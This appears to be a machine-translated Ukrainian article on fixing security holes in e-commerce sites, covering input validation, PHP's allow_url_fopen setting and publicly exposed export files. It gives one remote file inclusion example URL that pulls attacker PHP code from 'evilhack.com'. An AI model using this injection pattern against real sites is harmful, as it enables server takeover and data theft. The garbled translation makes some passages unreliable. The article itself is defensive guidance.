E-комерції - Підключення дірок в безпеці

Безпека електронної комерції сайт повинен бути один з основних моментів при розробці сайту E-комерція або програмного забезпечення. Розробник повинен бути в курсі всіх міркувань безпеки при розробці сайту. З електронної торгівлі все більше поширення в ці дні, число атак, безумовно, зростає. Параноя це здорова річ для електронної комерції Розробники сайту, ми повинні тримати у ворота з питаннями безпеки, і тримати наші очі і вуха відкритими. Хоча такі серйозні лазівки, такі лазівки, якщо цієї легко виправлені.

Нижче перераховані деякі міркування безпеки повинні бути включені при розробці сайту. Дана стаття не поширюється на E-крадіжки, будь ласка, див. мою окрему статтю з цього питання.

Введення користувача - введення кожного, будь то вступаємо в кількості, пошук продуктів, ввівши ім'я і т.д., повинні бути перевірені на підозрілі символи. Якщо цього не зробити, то можна ввести "?>", закриття кінця тегів PHP і виконувати деякий код PHP.

Набагато безпечніше дозволити цифр і букв AZ (столиць включений) і 0-9, і більше нічого, ніж зробити список всіх символів, які не повинні бути там. Перевірка сценарію необхідно, щоб перегорнути кожного символу по одному. Це має бути досягнуто використанням перевірки автентичності сервера в сторону, а не JavaScript. За допомогою серверних перевірки вхідних даних необхідна для захисту від небажаної символи

Там існує інша основним під час виконання PHP-коду. При використанні PHP є параметр називається allow_url_fopen який дозволить відкриття файлів із сценаріїв PHP. Ця опція повинна бути відключена, якщо не абсолютно необхідно.

Тільки уявіть, у вас є PHP скрипти для фіксованих верхніх і нижніх колонтитулів, а також для доступу до веб-сторінок вам потрібно набрати в http://www.mysite.com/index.php?page=page2. Все що потрібно це зловмисникові запускати сценарій, змінюючи ці параметри, ввівши "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" з PHP код у файлі "hacker.txt". Ви могли б що-небудь трапиться, PHP файлу читати, видалені життєво важливі вкрадена інформація.

Якщо ви не впевнені, якщо цей параметр включений або виключений, необхідно скопіювати наступний код PHP в текстовий файл та завантажте його на свій веб-сервер:

phpinfo ();
?>

При доступі до скрипт на вашому веб-сервері, ви повинні прийти через настроювання конфігурації під allow_url_fopen.

Користувач комп'ютера, за нормальних обставин не може знайти значення цього параметра.

Будьте обережні з експортовані дані, як замовлення, продукція в CSV і MySQL файлів. Якщо ці дані експортуються з сценарію і зберігається на веб-сервері під загальною тобто ім'я файлу. http://www.mysite.com/admin/output_tables.csv. Це тільки дійсно проблема, коли експортувала дані зберігаються у файлі в директорії, яка є загальнодоступною. Існує два способи запобігти цій лазівку безпеки - спочатку у вихідному файлі за паролем каталогів, по-друге, є дані, розташовані всередині форми HTML Textarea елемент сценарію. Власник магазину, можна скопіювати цю інформацію з текстових файлів і створити новий файл на свій комп'ютер і вставте в них відомості.

Все що потрібно це хакерів, щоб знайти цей файл, перевіряючи електронну демо-сайт торгово програмного забезпечення і подивитися на той же файл на реальному сайті.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Перегляд відео Як захистити комп'ютер Secure	Перегляд відео Як перевірити параметри безпеки в Windows Vista

Нижче перераховані інші статті, пов'язані з вищевказаної статті зі статті "Електронна торгівля" категорію.

Люди, які цікавляться в вищевказаної статті "Е-комерції - Підключення дірок в безпеці", також зацікавлені у відповідних статтях, перерахованих нижче: